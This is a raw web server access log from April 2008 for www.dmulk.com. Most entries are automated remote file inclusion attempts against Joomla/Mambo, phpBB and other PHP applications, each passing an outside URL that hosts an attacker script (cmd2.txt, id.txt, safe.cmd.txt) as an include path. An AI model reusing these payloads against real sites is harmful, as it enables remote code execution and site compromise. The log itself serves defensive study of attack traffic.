195.34.78.106 - - [07/Apr/2008:09:34:32 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:34:33 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:34:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:34:35 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:34:36 -0700] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:09:34:38 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:34:44 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:34:55 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:35:01 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:35:16 -0700] "GET /logs/access_080324.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:35:17 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:35:18 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:35:18 -0700] "GET /logs/access_080312.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:09:35:19 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:09:35:21 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:35:29 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:35:32 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:35:33 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:35:33 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:36:10 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.106.71.5 - - [07/Apr/2008:09:36:11 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aceperform.110mb.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.106.71.5 - - [07/Apr/2008:09:36:11 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aceperform.110mb.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.13.6.70 - - [07/Apr/2008:09:36:23 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.0" 200 7355 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.13.6.70 - - [07/Apr/2008:09:36:23 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:36:43 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:36:44 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:36:44 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:36:59 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:37:00 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:37:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:37:06 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:37:08 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
85.37.186.93 - - [07/Apr/2008:09:37:08 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:37:08 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:37:16 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:37:16 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:37:16 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:37:30 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:37:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.91 - - [07/Apr/2008:09:37:43 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:37:45 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:37:47 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:37:47 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.30.170.102 - - [07/Apr/2008:09:37:48 -0700] "GET /logs/access_080108.log/modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:37:53 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:37:56 -0700] "GET /logs/access_080309.log/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:38:03 -0700] "GET /minamijewelry/ HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:38:04 -0700] "GET /funny/ HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:38:06 -0700] "GET /imperant/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:38:08 -0700] "GET /?S=A HTTP/1.1" 200 7371 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:38:09 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:09:38:11 -0700] "GET /?M=A HTTP/1.1" 200 7371 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
208.16.236.69 - - [07/Apr/2008:09:38:16 -0700] "GET /main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:38:32 -0700] "HEAD /logs/access_071129.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:39:00 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:39:26 -0700] "GET /logs/access_080329.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:39:37 -0700] "HEAD /logs/access_080125.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:39:56 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:39:59 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:40:17 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:40:25 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:40:35 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:09:40:37 -0700] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:09:40:46 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:40:56 -0700] "GET /logs/access_080329.log//modules/agendax/addevent.inc.php?agendax_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:40:57 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:40:57 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:41:08 -0700] "GET /logs/access_080329.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:41:10 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:41:10 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:09:41:30 -0700] "GET /logs/access_080119.log/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.106 - - [07/Apr/2008:09:41:31 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 491234 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.16.16.208 - - [07/Apr/2008:09:41:31 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [07/Apr/2008:09:41:31 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [07/Apr/2008:09:41:32 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:41:41 -0700] "HEAD /logs/access_080118.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
140.120.27.17 - - [07/Apr/2008:09:41:46 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [07/Apr/2008:09:41:48 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [07/Apr/2008:09:41:48 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:41:50 -0700] "GET /logs/access_071209.log HTTP/1.0" 200 44097 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:41:53 -0700] "GET /logs/access_070721.log HTTP/1.0" 200 23814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:42:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:09:42:05 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.hddshare.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:42:09 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:42:10 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:42:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:42:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [07/Apr/2008:09:42:20 -0700] "GET /logs/access_080308.log//init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [07/Apr/2008:09:42:20 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [07/Apr/2008:09:42:21 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [07/Apr/2008:09:42:30 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:42:42 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:42:42 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:42:43 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:42:46 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:42:47 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:09:42:47 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:09:43:01 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:09:43:01 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:09:43:02 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:43:09 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.64.152 - - [07/Apr/2008:09:43:23 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [07/Apr/2008:09:43:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:43:24 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:43:24 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:43:24 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.152 - - [07/Apr/2008:09:43:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:43:26 -0700] "HEAD /logs/access_080207.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
89.108.64.152 - - [07/Apr/2008:09:43:27 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.redladys.net/tgp/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:43:30 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:43:32 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:43:32 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
